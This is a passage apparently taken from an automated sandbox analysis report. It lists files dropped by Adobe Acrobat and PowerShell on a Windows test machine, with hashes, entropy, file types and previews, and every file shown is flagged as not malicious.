                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):289
                                                                                  Entropy (8bit):5.299556555241285
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJf8dPeUkwRe9:YvXKXgWBMVbsdTeODZGU8Ukee9
                                                                                  MD5:FDAEF23758E3D823DC81FF428DDB5730
                                                                                  SHA1:17A2B9ACF7540CC9A1335550F78CBB490EC0A0A7
                                                                                  SHA-256:BFDB27D9C1ABB3D49BB079E003E3C82138E30B63A48163E81B2EF7E4C45A6D44
                                                                                  SHA-512:78C32AC0177D324AF082689FC6A053F1EA6B3A329732062534BBDD90ADABB47568C1ED3E87D96D71AE5879CF2706F99033CBC388A71AB1DC6B3881A174CAF297
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):292
                                                                                  Entropy (8bit):5.304061543581749
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfQ1rPeUkwRe9:YvXKXgWBMVbsdTeODZGY16Ukee9
                                                                                  MD5:F0A0D5B8F9D2637869E025433FEF2A8B
                                                                                  SHA1:1F5DEAD4564A1452A4EF5A528BBADE11C54FEA10
                                                                                  SHA-256:A729174AAAA623695883FD1455F26DD1EC80C0A5E00EF837EE03E3964AAB862D
                                                                                  SHA-512:5054F836CB391ACCC51A9C0BFC40A18AE06B7655F34BA4BC413E8ACA43F26B29F1133EDDA92C8379057CC30D4CDBA31A59D3B2A9154814CEC1DE074BFABEA02E
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):289
                                                                                  Entropy (8bit):5.318181860922783
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfFldPeUkwRe9:YvXKXgWBMVbsdTeODZGz8Ukee9
                                                                                  MD5:DE2A2425FC3DD5BE397F18F6FE94C9A2
                                                                                  SHA1:DC37A3AA03C448EB824007BFCC3465AC4AD82F37
                                                                                  SHA-256:F48ABEC819111463EDA1B41EA381D96FD7253319DFEB3CA257D6907916933A58
                                                                                  SHA-512:2889D61B9043D243850C1DCBF992149CB5D68E92063FBBBC59BD8998862D111A4B00AC8EBAE17190C33E65A15C7AC1BADDB53B98C67D3AB9E29D41264447FF31
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):295
                                                                                  Entropy (8bit):5.326291326872587
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfzdPeUkwRe9:YvXKXgWBMVbsdTeODZGb8Ukee9
                                                                                  MD5:73F834BE524AA5216FAE108C983BC59E
                                                                                  SHA1:613E4E2E6DCE044448D92F5BDD77817A90C401D1
                                                                                  SHA-256:84EFE02EAFF9C6B835AD3BA48FE36DCDBC992B1851C3D0A00A7E0642AA65F7D7
                                                                                  SHA-512:7E55D23E879B838CECFE241C503B3EEB39FC18FEAD56C86A82BA1EEC1855F179A2868225958599F8A1ADBB0DE9D3EC35FB7E66ACE921E0B6D7FC269D9B52CA40
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):289
                                                                                  Entropy (8bit):5.3070788974515475
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfYdPeUkwRe9:YvXKXgWBMVbsdTeODZGg8Ukee9
                                                                                  MD5:15CD30EC32245147F65092BB6D74014E
                                                                                  SHA1:E712DFC0FCDF880A9215DBD84FE1B65850D83A0F
                                                                                  SHA-256:0F44C9703B4E0E2EBD6262D1982464B5C746BC75AFB50C228F00BE56125B0EAC
                                                                                  SHA-512:C09C78A28F5EE9BAB7F46551E638CC476F6D5092852717529F1CDDB5B20AC3251A5878497BFEAA80250E24AC8551FA6D45045D932EBA43F8ED08DDC4528128DF
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):284
                                                                                  Entropy (8bit):5.29293619721764
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJf+dPeUkwRe9:YvXKXgWBMVbsdTeODZG28Ukee9
                                                                                  MD5:88E7C6C90BD8CB1BB76537CD19AC246B
                                                                                  SHA1:83CE82580CEAFFEC328C3BDCBC5D1F627E98B87B
                                                                                  SHA-256:DE33756E079A7D224D8C704C8DC4A84B88F7CBC391AFA37567C20136B12876AC
                                                                                  SHA-512:49B71BCA3EFF312E43C15F63D3F557BFAA5C583731E7889280036485254FCC6E9BD684DA356507FE41480D0227061E3DFB407FD7A50D3EA6C6229636E7C438AB
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):291
                                                                                  Entropy (8bit):5.290577342909249
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfbPtdPeUkwRe9:YvXKXgWBMVbsdTeODZGDV8Ukee9
                                                                                  MD5:36587F6F6C8328612992F4CAE2D8EE0E
                                                                                  SHA1:7C881A9E4CBE281123248DCF4AF95DE743894E5D
                                                                                  SHA-256:95CA4A1712259372D82144E6956917124C6E1971280B915300225012234BF1CD
                                                                                  SHA-512:DAA88B98865539F9BC41F49E72780D1E816C9AFA1C0813DCFF028C006E60E6F09F46D3C1E9A0A68AA249D65B522C866C9A10F5723B20E2DF1FD7E29BA86C920B
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):287
                                                                                  Entropy (8bit):5.295326778057465
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJf21rPeUkwRe9:YvXKXgWBMVbsdTeODZG+16Ukee9
                                                                                  MD5:0CEF07D99CCE5580993B5A4B5E2A4A43
                                                                                  SHA1:276D33595585BF29D1314DD307A90F503D572293
                                                                                  SHA-256:4E51D4826DC3CB5CBA241B2E2A6A9268D02552B6A7CA71F50A064A6DAA8D3AAE
                                                                                  SHA-512:194C825CA9860E59576E4FD97B293DBA93D49EEEED2BE7DE3AF337D6C1B71D887D8788351D94A639E1AECFBE7C0A156077EFBD2BF69244523E645D498BE65F3E
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):1090
                                                                                  Entropy (8bit):5.668726724356089
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:Yv6Xg/bmeOGamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSm:YvfCedBgkDMUJUAh8cvMm
                                                                                  MD5:91D080E67AC7EDA3608FEB30F4EE6FEC
                                                                                  SHA1:F5995A7F71A755358F36D0F3303BE963A9D21B4F
                                                                                  SHA-256:40B48BF076630C978FBFDBF6942C8CE34ACDB86D5D27E9E60789795C2B9E24D2
                                                                                  SHA-512:D6BC0A694F4074C535CEF1C94F6547530BE0A38C30C81BAE6C0DD46EC6A7BAA0387510C4DC701D01ADC615C0676F75C62F70F6BBC3A26857C36CE08CBEDD2C79
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):286
                                                                                  Entropy (8bit):5.269536000432144
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfshHHrPeUkwRe9:YvXKXgWBMVbsdTeODZGUUUkee9
                                                                                  MD5:BA3A36D085342CADE8120132A8244B82
                                                                                  SHA1:415F0B6E89E17ECE31493D92AE0DC7B59D055463
                                                                                  SHA-256:E37CE183376811A7D926F9BAB34D871C27A2EC4B4672D5C5BF33B1184A0A85ED
                                                                                  SHA-512:4B9BDBB5015A33192B581A91B819D5164DB85C7848AAA65EC6033E375FAA4D0BF994E479CEB71357041E3BEB289788040A801770A99DAAD5256C99CF0E99ECBC
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):282
                                                                                  Entropy (8bit):5.290603768263948
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJTqgFCrPeUkwRe9:YvXKXgWBMVbsdTeODZGTq16Ukee9
                                                                                  MD5:73ECC9F3D61F5423065ECFD81FF16F1A
                                                                                  SHA1:57E116C08986597D4F578AD02CCAA24F742ED86C
                                                                                  SHA-256:3D5D8FADE4A13E159DBFEF344555B4CA20A2A3A0A9E38A0AED2EEFF3EFFCA8BD
                                                                                  SHA-512:47E9D31A49EA009A9BDCFA9F1FBAEDBB08AEC602351EB54B7110362E161EF3DDC45129DA9ADFC8EDF0CD5C2E51E2F64D05BC2584A01AC4F6D8FC788F605641A3
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):0.8112781244591328
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:e:e
                                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                  Malicious:false
                                                                                  Preview:....

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):2814
                                                                                  Entropy (8bit):5.13398019669336
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:YkjPLo3a0nayw+JaWViDoLt64lWJ/0GpNhjfj0SvwCD2t2LSBCvxk6S2Lc5x4z9j:YkjToi+BQ46RiArEQ0vWkp2IC9j
                                                                                  MD5:DD0160558827F163C6906973BF6FC14E
                                                                                  SHA1:F2A622AA10D13CF8273AFCC0D8B2C25FA9F660DE
                                                                                  SHA-256:32BC4C3F60C091217DD56D44271366C004E32CF9E0A6C1A489BB5784810D82C1
                                                                                  SHA-512:9C5109C6DDA869A164B128ECAD5A0958609C3F3C8AFC80336E341FA8EEEE5FFDB043DDC4E9182B23731359361E72036DDDF4BF70C2B6288701E8A9DA5D7C5D52
                                                                                  Malicious:false
                                                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"ea304e29de04410549fb3efa93963072","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734614075000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"869a04e4b9c959c2cf68b429d5477a08","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734614075000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"51a00a12b01d972a99d7f0509bc4f9c5","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734614075000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"8e53b7772507f3394e3e5e6e3d29c1af","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734614075000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"b8e29720fc399769c4405e0574924655","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734614075000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"22150f3281bdcc48ea370bb4aa487388","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                  Category:dropped
                                                                                  Size (bytes):12288
                                                                                  Entropy (8bit):1.452415437133283
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsoTilmTU:lNVmsw3SHtbDbPe0K3+fDZdzvo
                                                                                  MD5:EED734DFCBC0EAF0DE3B0EF9FB80E43B
                                                                                  SHA1:2E84A5D869A4DDCDCE722E1C467871A8E830D20E
                                                                                  SHA-256:0E15648808CFB570D7200D52B0DCD241738E99BA4AB44CDFFE8022B65A48E177
                                                                                  SHA-512:A085B9FA1D87EC86E38BF4F26D3AA3E2883A961BFD93F4874C6FA55C683E8BBF7F7BD6DDB4EEB43EFE7CB11D5D4AA2EFD0BD46D3FA41A4BED7A634AAF2F540A0
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite Rollback Journal
                                                                                  Category:dropped
                                                                                  Size (bytes):8720
                                                                                  Entropy (8bit):1.9573084794158802
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:7MxrvrBd6dHtbGIbPe0K3+fDy2dsoTLEqFl2GL7msh:7g3SHtbDbPe0K3+fDZdzcKVmsh
                                                                                  MD5:17244C830BB16952C77D68D28DE72934
                                                                                  SHA1:FCD6D88BF4625A69812E9BC23B538700F6CDC50A
                                                                                  SHA-256:DB56CBF5C81F42262E109D73D0EBF5C2758998FEDBDA14CCD243F36F9318C4F5
                                                                                  SHA-512:EC7BEDEF31896DA92FAF6CBECC58684DA3D24B23D8D0C8C11A5D6085762D21DB32E00379A87317570A6AC7673EDBBD444C974331FAC4FC7851A299B0D7E28145
                                                                                  Malicious:false
                                                                                  Preview:.... .c........Y......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):66726
                                                                                  Entropy (8bit):5.392739213842091
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEgXKrjNgHB6StKnxx0zaY8jVgYyu:6a6TZ44ADEXKrABntyvhWK
                                                                                  MD5:786D31FC2A1AD4742808C9E31BB0C6C9
                                                                                  SHA1:CEB17328B06A5CE3C86F5DAE388A3E9DB2420CD7
                                                                                  SHA-256:F55FF30A750B24D69F6F069AC6C56550F329BE36E4996FA8374A4488C4DE9A15
                                                                                  SHA-512:DED5E60B6E0DC0DB89AAE310603CEF53CFD80F8E15FDF9C292A2AACFB611D49ACC00AF2B6C4A3713993E314301AD1F2F53AE1B60A1286358AE89BA27BAA01F92
                                                                                  Malicious:false
                                                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlllul79Yll//Z:NllUGl
                                                                                  MD5:851849E23E67E904A88407CDB0964345
                                                                                  SHA1:4B33734D0E176A208FE58C3EB552CA42A9F6ECD9
                                                                                  SHA-256:CCDB092D6A7666749275AC8E7AFBCB9CC36BA225054ABFD6F8C94D152FB65BCB
                                                                                  SHA-512:030ACC5F1C6C53410065D6DD7BD8FB63BF9A5B4CCD31AC05A35A4D061F595954FECCF9B93EC9FE195269018687EA10F963B7C5B82CEA305304B7781E1B23CAAA
                                                                                  Malicious:false
                                                                                  Preview:@...e.................................j.}............@..........

                                                                                  C:\Users\user\AppData\Local\Temp\MSI49c47.LOG

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):246
                                                                                  Entropy (8bit):3.5197430193686525
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlAwlJH:Qw946cPbiOxDlbYnuRKS
                                                                                  MD5:3C7C273DD17E759D75650CEED75E5DB8
                                                                                  SHA1:50844EA6EE792CC963774E0417923DD3BBB4FD8E
                                                                                  SHA-256:EDAF51160C761EA41AB7758C0190E32F7475FD2CABABF7E13BFBD6D1A295B519
                                                                                  SHA-512:0DD8062612416E379257AF18A327E0F56356885F39E7FE76DF6D4C693D3740F3D068D7BEC3F094AC977F699283182AC3E8F097A2B249777F93D2B7D9A7779E10
                                                                                  Malicious:false
                                                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.8.:.1.4.:.3.1. .=.=.=.....

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_az55bwgb.ayt.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kyhfsncm.ojy.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pllhbvpx.p2x.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
